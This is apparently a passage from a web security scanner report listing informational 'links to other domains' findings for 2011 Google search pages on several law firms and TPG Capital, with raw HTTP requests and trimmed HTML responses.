<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AX2oLhHhl-4J:www.dmoc.com/+Diserio+Martin+O%27Connor+%26+Castiglioni&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:AX2oLhHhl-4J:www.dmoc.com/+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.dmoc.com/attorneys" onmousedown="return clk(this.href,'','','','1','','0CB0QqwMoADAA')">Attorneys</a></div><div class=sld><a class=sla href="http://www.dmoc.com/contact" onmousedown="return clk(this.href,'','','','1','','0CB4QqwMoATAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.dmoc.com/practice/litigation" onmousedown="return clk(this.href,'','','','1','','0CB8QqwMoAjAA')">Litigation</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.dmoc.com/news" onmousedown="return clk(this.href,'','','','1','','0CCAQqwMoAzAA')">News &amp; Events</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.dmoc.com/publications/congress-finally-addresses-estate-tax" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoBDAA')">Congress Finally Addresses the ...</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.dmoc.com/publications/connecticut-new-home-warranties-act" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoBTAA')">Connecticut New Home Warranties Act</a>
...[SNIP]...
<h3 class="r"><a href="http://www.dmoc.com/attorneys" class=l onmousedown="return clk(this.href,'','','','3','','0CCwQFjAC')">Attorneys | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ceIqGucG0jsJ:www.dmoc.com/attorneys+Diserio+Martin+O%27Connor+%26+Castiglioni&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:ceIqGucG0jsJ:www.dmoc.com/attorneys+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CDEQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.dmoc.com/contact" class=l onmousedown="return clk(this.href,'','','','4','','0CDIQFjAD')">Contact Us | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ULoY1-RX8x4J:www.dmoc.com/contact+Diserio+Martin+O%27Connor+%26+Castiglioni&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:ULoY1-RX8x4J:www.dmoc.com/contact+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CDcQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pview.findlaw.com/cmd/view?wld_id=1629220&amp;pid=1" class=l onmousedown="return clk(this.href,'','','','5','','0CDkQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:-clXcyP5dswJ:pview.findlaw.com/cmd/view%3Fwld_id%3D1629220%26pid%3D1+Diserio+Martin+O%27Connor+%26+Castiglioni&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:-clXcyP5dswJ:pview.findlaw.com/cmd/view%3Fwld_id%3D1629220%26pid%3D1+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CD4QIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyercasting.com/2011/01/client-diserio-martin-oconnor-castiglioni-llp-launches-new-website.html" class=l onmousedown="return clk(this.href,'','','','6','','0CEEQFjAF')">Client <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:owqVrb8uFTwJ:www.lawyercasting.com/2011/01/client-diserio-martin-oconnor-castiglioni-llp-launches-new-website.html+Diserio+Martin+O%27Connor+%26+Castiglioni&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:owqVrb8uFTwJ:www.lawyercasting.com/2011/01/client-diserio-martin-oconnor-castiglioni-llp-launches-new-website.html+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CEYQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/diserio-martin-o%27connor-&amp;-castiglioni" class=l onmousedown="return clk('http://www.linkedin.com/company/diserio-martin-o%27connor-&-castiglioni','','','','7','','0CEcQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:BLF2Ik-KvwsJ:www.linkedin.com/company/diserio-martin-o%27connor-%26-castiglioni+Diserio+Martin+O%27Connor+%26+Castiglioni&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:BLF2Ik-KvwsJ:www.linkedin.com/company/diserio-martin-o%27connor-%26-castiglioni+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CEwQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Diserio-Martin-OConnor-Castiglioni/law-firm-265489.htm" class=l onmousedown="return clk(this.href,'','','','8','','0CE0QFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:3qU_gAtpAA4J:www.martindale.com/Diserio-Martin-OConnor-Castiglioni/law-firm-265489.htm+Diserio+Martin+O%27Connor+%26+Castiglioni&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:3qU_gAtpAA4J:www.martindale.com/Diserio-Martin-OConnor-Castiglioni/law-firm-265489.htm+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CFIQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.elawmarketing.com/portfolio/flash-animation/diserio-martin-oconnor-castiglioni-flash-holiday-card" class=l onmousedown="return clk(this.href,'','','','9','','0CFMQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:I8TAZCt2FD8J:www.elawmarketing.com/portfolio/flash-animation/diserio-martin-oconnor-castiglioni-flash-holiday-card+Diserio+Martin+O%27Connor+%26+Castiglioni&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:I8TAZCt2FD8J:www.elawmarketing.com/portfolio/flash-animation/diserio-martin-oconnor-castiglioni-flash-holiday-card+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CFgQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/connecticut/lawfirm/Diserio-Martin-OConnor-and-Castiglioni-LLP/8d61fc59-a3f2-47ed-a5a7-b6e044df09a8.html" class=l onmousedown="return clk(this.href,'','','','10','','0CFkQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:VjClvH9dFCwJ:www.superlawyers.com/connecticut/lawfirm/Diserio-Martin-OConnor-and-Castiglioni-LLP/8d61fc59-a3f2-47ed-a5a7-b6e044df09a8.html+Diserio+Martin+O%27Connor+%26+Castiglioni&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:VjClvH9dFCwJ:www.superlawyers.com/connecticut/lawfirm/Diserio-Martin-OConnor-and-Castiglioni-LLP/8d61fc59-a3f2-47ed-a5a7-b6e044df09a8.html+Diserio+Martin+O%27Connor+%26+Castiglioni&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CF4QIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/Connecticut/Stamford/Diserio-Martin-O-Connor-and-Castiglioni-LLP-335325-f.html" class=l onmousedown="return clk(this.href,'','','','11','','0CF8QFjAK')"><em>
...[SNIP]...
<div><a href="http://www.wilsonrms.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CGcQoggwCw')">Wilson RMS</a>
...[SNIP]...
<div><a href="http://www.seaboardproperties.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CGkQoggwDA')">Seaboard</a>
...[SNIP]...
<div><a href="http://www.znclaw.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CGsQoggwDQ')">znclaw</a>
...[SNIP]...
<div><a href="http://stamford-ct.lawinfo.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CG0QoggwDg')">Stamford Lawyer Directory</a>
...[SNIP]...

19.49. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=Fried+Kane+Walters+Zuschlag+Grochmal&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:20:24 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 68431

<!doctype html> <head> <title>Fried Kane Walters Zuschlag Grochmal - Google Search</title> <script>window.google={kEI:"iNDLTezxNqfZ0QGR1dT8Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,2
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Fried+Kane+Walters+Zuschlag+Grochmal&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.friedkanelaw.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')">FKWZ&amp;G Home</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:FwRjJ78tES8J:www.friedkanelaw.com/+Fried+Kane+Walters+Zuschlag+Grochmal&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.friedkanelaw.com/Second/history_main.htm" class=l onmousedown="return clk(this.href,'','','','2','','0CB0QFjAB')">FKWZ&amp;G History</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:igpudMiUJPIJ:www.friedkanelaw.com/Second/history_main.htm+Fried+Kane+Walters+Zuschlag+Grochmal&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCIQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.friedkanelaw.com/Attorneys/jam_main.htm" class=l onmousedown="return clk(this.href,'','','','3','','0CCQQFjAC')">James A. Mazzotta</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:a2Yv2HW6nOsJ:www.friedkanelaw.com/Attorneys/jam_main.htm+Fried+Kane+Walters+Zuschlag+Grochmal&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CCkQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.friedkanelaw.com/Attorneys/mds_main.htm" class=l onmousedown="return clk(this.href,'','','','4','','0CCoQFjAD')">Michael D. Sherman</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mAK-4icWzX0J:www.friedkanelaw.com/Attorneys/mds_main.htm+Fried+Kane+Walters+Zuschlag+Grochmal&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CC8QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.yellowpages.com/pittsburgh-pa/mip/fried-kane-walters-zuschlag-grochmal-28209975" class=l onmousedown="return clk(this.href,'','','','5','','0CDIQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:dMxVwFuLV5IJ:www.yellowpages.com/pittsburgh-pa/mip/fried-kane-walters-zuschlag-grochmal-28209975+Fried+Kane+Walters+Zuschlag+Grochmal&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDcQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.law.pitt.edu/career/directories/smallfirms/fried-kane-walters-zuschlag-grochmal" class=l onmousedown="return clk(this.href,'','','','6','','0CDgQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QphxVRFOp5cJ:www.law.pitt.edu/career/directories/smallfirms/fried-kane-walters-zuschlag-grochmal+Fried+Kane+Walters+Zuschlag+Grochmal&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CD0QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/Pennsylvania/Pittsburgh/Fried,-Kane,-Walters,-Zuschlag-and-Grochmal-1555509-f.html" class=l onmousedown="return clk(this.href,'','','','7','','0CD4QFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:tyq4wIaSHmMJ:www.lawyers.com/Pennsylvania/Pittsburgh/Fried,-Kane,-Walters,-Zuschlag-and-Grochmal-1555509-f.html+Fried+Kane+Walters+Zuschlag+Grochmal&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEUQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pittsburghdirectory.examiner.com/fried+kane+walters+zuschlag+and+grochmal.9.16420815p.home.html" class=l onmousedown="return clk(this.href,'','','','8','','0CEYQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:0M70R66xG5IJ:pittsburghdirectory.examiner.com/fried%2Bkane%2Bwalters%2Bzuschlag%2Band%2Bgrochmal.9.16420815p.home.html+Fried+Kane+Walters+Zuschlag+Grochmal&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:0M70R66xG5IJ:pittsburghdirectory.examiner.com/fried%2Bkane%2Bwalters%2Bzuschlag%2Band%2Bgrochmal.9.16420815p.home.html+Fried+Kane+Walters+Zuschlag+Grochmal&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CEsQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/pennsylvania/lawfirm/Fried-Kane-Walters-Zuschlag-and-Grochmal/20fbe13d-a54b-43d2-952f-9422c9a65c37.html" class=l onmousedown="return clk(this.href,'','','','9','','0CEwQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:2oSim0EuE6sJ:www.superlawyers.com/pennsylvania/lawfirm/Fried-Kane-Walters-Zuschlag-and-Grochmal/20fbe13d-a54b-43d2-952f-9422c9a65c37.html+Fried+Kane+Walters+Zuschlag+Grochmal&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFEQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pittsburgh.attorneydirectorydb.org/attorneys/fried-kane-walters-zuschlag-grochmal" class=l onmousedown="return clk(this.href,'','','','10','','0CFIQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:eJlOzFghDWoJ:pittsburgh.attorneydirectorydb.org/attorneys/fried-kane-walters-zuschlag-grochmal+Fried+Kane+Walters+Zuschlag+Grochmal&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CFcQIDAJ')">Cached</a>
...[SNIP]...

19.50. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=TPG+Capital HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:16:09 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 88184

<!doctype html> <head> <title>TPG Capital - Google Search</title> <script>window.google={kEI:"ecHLTYCjLMby0gGQ8-jFBg",kEXPI:"17259,24472,25907,27147,28505,28766,28887,29229,29509,29685,29795,29
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=TPG+Capital&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tpg.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CB4QFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6xlcfNtqP1cJ:www.tpg.com/+TPG+Capital&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCMQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tpg.com/about/index.html" class=l onmousedown="return clk(this.href,'','','','2','','0CCUQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZaEDv7jfxtwJ:www.tpg.com/about/index.html+TPG+Capital&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCoQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/TPG_Capital" class=l onmousedown="return clk(this.href,'','','','3','','0CCwQFjAC')"><em>
...[SNIP]...
<div class=osl><a href="http://en.wikipedia.org/wiki/TPG_Capital#Private_equity_funds" onmousedown="return clk(this.href,'','','','3','','0CDMQ0gIoADAC')">Private equity funds</a> - <a href="http://en.wikipedia.org/wiki/TPG_Capital#History_and_notable_Investments" onmousedown="return clk(this.href,'','','','3','','0CDQQ0gIoATAC')">History and notable Investments</a> - <a href="http://en.wikipedia.org/wiki/TPG_Capital#Newbridge_Capital" onmousedown="return clk(this.href,'','','','3','','0CDUQ0gIoAjAC')">Newbridge Capital</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:fSPc5_nyCLwJ:en.wikipedia.org/wiki/TPG_Capital+TPG+Capital&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDEQIDAC')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://www.bloomberg.com/news/2011-05-11/landis-gyr-is-said-to-get-takeover-offers-from-toshiba-tpg-capital-eqt.html" class=l onmousedown="return clk(this.href,'','','','4','','0CDcQqQIwAw')">Landis+Gyr Said to Receive Takeover Bids</a>
...[SNIP]...
<span class=tl><a href="http://www.bloomberg.com/news/2011-05-12/quintiles-raises-rate-to-fix-balance-sheet-corporate-finance.html" class=l onmousedown="return clk(this.href,'','','','5','','0CD0QqQIwBA')">Quintiles Raises Rate to Fix Balance Sheet: Corporate Finance</a>
...[SNIP]...
<span class=tl><a href="http://www.bloomberg.com/news/2011-05-09/tpg-said-to-seek-asia-chairman-to-assist-expansion-in-china.html" class=l onmousedown="return clk(this.href,'','','','6','','0CEMQqQIwBQ')"><em>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=23307" class=l onmousedown="return clk(this.href,'','','','7','','0CEwQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:3uKyF7-ccsYJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D23307+TPG+Capital&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:3uKyF7-ccsYJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D23307+TPG+Capital&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com','','','','7','','0CFIQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tpgventures.com/" class=l onmousedown="return clk(this.href,'','','','8','','0CFQQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:y8yAkMVuOzoJ:www.tpgventures.com/+TPG+Capital&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CFkQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hoovers.com/company/TPG_Capital_LP/hrhchi-1.html" class=l onmousedown="return clk(this.href,'','','','9','','0CFsQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:-O-vy4w_6YUJ:www.hoovers.com/company/TPG_Capital_LP/hrhchi-1.html+TPG+Capital&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGAQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.fins.com/Finance/Companies/192/TPG-Capital" class=l onmousedown="return clk(this.href,'','','','10','','0CGIQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:CT_IcsFIBWEJ:www.fins.com/Finance/Companies/192/TPG-Capital+TPG+Capital&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGcQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://biz.yahoo.com/ic/51/51545.html" class=l onmousedown="return clk(this.href,'','','','11','','0CGkQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NoEaFuGlxAIJ:biz.yahoo.com/ic/51/51545.html+TPG+Capital&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CHEQIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/tpg-axon-capital" class=l onmousedown="return clk(this.href,'','','','12','','0CHQQFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:1ote0JSYFxkJ:www.linkedin.com/company/tpg-axon-capital+TPG+Capital&amp;cd=12&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','12','','0CHkQIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://wallstcheatsheet.com/trading/tpg-axon-capital-reduces-international-paper-stake.html" class=l onmousedown="return clk(this.href,'','','','13','','0CHsQFjAM')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:H2SIyp1wofkJ:wallstcheatsheet.com/trading/tpg-axon-capital-reduces-international-paper-stake.html+TPG+Capital&amp;cd=13&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','13','','0CIABECAwDA')">Cached</a>
...[SNIP]...

19.51. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=Benesch+Friedlander+Coplan+%26+Aronoff&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:16:07 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 80442

<!doctype html> <head> <title>Benesch Friedlander Coplan &amp; Aronoff - Google Search</title> <script>window.google={kEI:"h8_LTeebEYLZ0QHv2pX2Bg",kEXPI:"17259,23756,24692,24878,24879,27400,281
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Benesch+Friedlander+Coplan+%26+Aronoff&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.beneschlaw.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBsQFjAA')"><em>
...[SNIP]...
<div class=sld><a class=sla href="http://www.beneschlaw.com/professionals/xprProfessionalSearch3.aspx?xpST=ProfessionalSearch" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoADAA')">Attorneys</a></div><div class=sld><a class=sla href="http://www.beneschlaw.com/offices/xprOfficeList1.aspx?xpST=OfficeList" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoATAA')">Locations</a></div><div class=sld><a class=sla href="http://www.beneschlaw.com/careers/xprGeneralContentCareerFlash.aspx?xpST=CareersOverview" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoAjAA')">Join the Firm</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.beneschlaw.com/aboutus/xprGeneralContent2.aspx?xpST=AboutUs" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoAzAA')">About the Firm</a>
